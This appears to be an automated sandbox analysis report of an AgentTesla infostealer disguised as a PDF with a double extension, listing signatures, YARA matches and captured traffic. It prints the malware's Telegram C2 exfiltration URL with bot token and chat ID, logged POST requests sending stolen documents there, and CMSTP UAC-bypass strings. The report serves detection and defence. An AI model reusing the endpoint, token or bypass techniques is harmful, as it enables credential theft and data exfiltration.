Windows Analysis Report
hesaphareketi-01.pdf.exe

Overview

General Information

Sample name: hesaphareketi-01.pdf.exe
Analysis ID: 1446992
MD5: 8f184daf4d3d0fac93db93c798e616ed
SHA1: f8c6c99b7e0572347ed1bee3ddb425e31f6cb643
SHA256: 97fa9df0ae7536db7c2427ff65ba51db3bbd22ebe957bf406ebe3f4ba4a46f7f
Tags: AgentTesla, exe, geo, Telegram, TUR

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • hesaphareketi-01.pdf.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe" MD5: 8F184DAF4D3D0FAC93DB93C798E616ED)
    • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendMessage?chat_id=6553028274"}
Source: hesaphareketi-01.pdf.exe, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: hesaphareketi-01.pdf.exe, Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD, Description: Detects Windows executables bypassing UAC using CMSTP utility, command line and INF, Author: ditekSHen
  • 0x14fa04:$s2: taskkill /IM cmstp.exe /F
  • 0x14f936:$s5: RunPreSetupCommands=RunPreSetupCommandsSection
  • 0x14fafa:$s6: "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
Source: sslproxydump.pcap, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000000.00000000.1208684446.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security
Source: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security
Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
  • 0x314fc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3156e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x315f8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3168a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x316f4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31766:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x317fc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3188c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 3.2.RegAsm.exe.400000.0.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

                        System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe", CommandLine: "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe, NewProcessName: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe, OriginalFileName: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe", ProcessId: 6992, ProcessName: hesaphareketi-01.pdf.exe
Timestamp: 05/24/24-07:41:27.363485
SID: 2851779
Source Port: 49700
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

                        AV Detection

Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendMessage?chat_id=6553028274"}
Source: RegAsm.exe.6596.3.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendMessage"}
Source: hesaphareketi-01.pdf.exe, ReversingLabs: Detection: 34%
Source: hesaphareketi-01.pdf.exe, Virustotal: Detection: 39%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.6% probability

                        Exploits

Source: Yara match, File source: hesaphareketi-01.pdf.exe, type: SAMPLE
Source: Yara match, File source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.hesaphareketi-01.pdf.exe.7ff7341d0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.hesaphareketi-01.pdf.exe.7ff7341d0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000000.1208684446.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: hesaphareketi-01.pdf.exe PID: 6992, type: MEMORYSTR
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49714 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49724 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: hesaphareketi-01.pdf.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                        Networking

Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49700 -> 149.154.167.220:443
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc7b929ff59cb4 | Host: api.telegram.org | Content-Length: 980 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc88931a5d0108 | Host: api.telegram.org | Content-Length: 66751 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc90cd1e5e4e83 | Host: api.telegram.org | Content-Length: 66751 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc9817b6b6812f | Host: api.telegram.org | Content-Length: 70703 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc9a12c02f0750 | Host: api.telegram.org | Content-Length: 70703 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc9c148a05a466 | Host: api.telegram.org | Content-Length: 66751 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc9ece9c66b2c0 | Host: api.telegram.org | Content-Length: 66751 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dca51c7ada008a | Host: api.telegram.org | Content-Length: 66754 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dca773f71df223 | Host: api.telegram.org | Content-Length: 66754 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcaba1a50f6e18 | Host: api.telegram.org | Content-Length: 66754 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcae7fd2a8c765 | Host: api.telegram.org | Content-Length: 67229 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcb1ecef588748 | Host: api.telegram.org | Content-Length: 67317 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcb6c88add5f77 | Host: api.telegram.org | Content-Length: 66754 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcc4c57a67a1f1 | Host: api.telegram.org | Content-Length: 66765 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcc78492d93770 | Host: api.telegram.org | Content-Length: 66765 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dccb6d9b422ea1 | Host: api.telegram.org | Content-Length: 66765 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcce4615a1f8c7 | Host: api.telegram.org | Content-Length: 66765 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcd0bba16aab02 | Host: api.telegram.org | Content-Length: 66765 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcd5bf69ee82a1 | Host: api.telegram.org | Content-Length: 66989 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcd96a0224ce84 | Host: api.telegram.org | Content-Length: 66765 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dcdd588123294f | Host: api.telegram.org | Content-Length: 66765 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc7b9c07669e21 | Host: api.telegram.org | Content-Length: 66765 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 104.26.13.205
Source: Joe Sandbox View, ASN Name: TELEGRAMRU
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
Source: unknown, HTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dc7b929ff59cb4 | Host: api.telegram.org | Content-Length: 980 | Expect: 100-continue | Connection: Keep-Alive
Source: RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://api.telegram.org
Source: hesaphareketi-01.pdf.exe, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidX
Source: hesaphareketi-01.pdf.exe, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
Source: hesaphareketi-01.pdf.exe, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX
Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://account.dyn.com/
Source: hesaphareketi-01.pdf.exe, String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002851000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org
Source: RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram
Source: RegAsm.exe, 00000003.00000002.3677180762.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org
Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002851000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/
Source: RegAsm.exe, 00000003.00000002.3677180762.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument
Source: RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.orgx

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, gmBpn1ecBmQ.cs | .Net Code: trwhO
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, gmBpn1ecBmQ.cs | .Net Code: trwhO
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window created: window name: CLIPBRDWNDCLASS

                        System Summary

                        Source: hesaphareketi-01.pdf.exe, type: SAMPLE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.7ff7341d0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Source: 0.0.hesaphareketi-01.pdf.exe.7ff7341d0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Source: initial sample | Static PE information: Filename: hesaphareketi-01.pdf.exe
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe | Code function: String function: 00007FF7341D9B60 appears 51 times
                        Source: hesaphareketi-01.pdf.exe | Binary or memory string: OriginalFilename vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000000.1208782135.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWriteLineAsyncd58ELEMENTTYPEINTERNAL.dllj% vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed430bae3-2e9e-4778-9cea-7bcd12b5f496.exe4 vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWriteLineAsyncd58ELEMENTTYPEINTERNAL.dllj% vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exe | Binary or memory string: OriginalFilenameWriteLineAsyncd58ELEMENTTYPEINTERNAL.dllj% vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
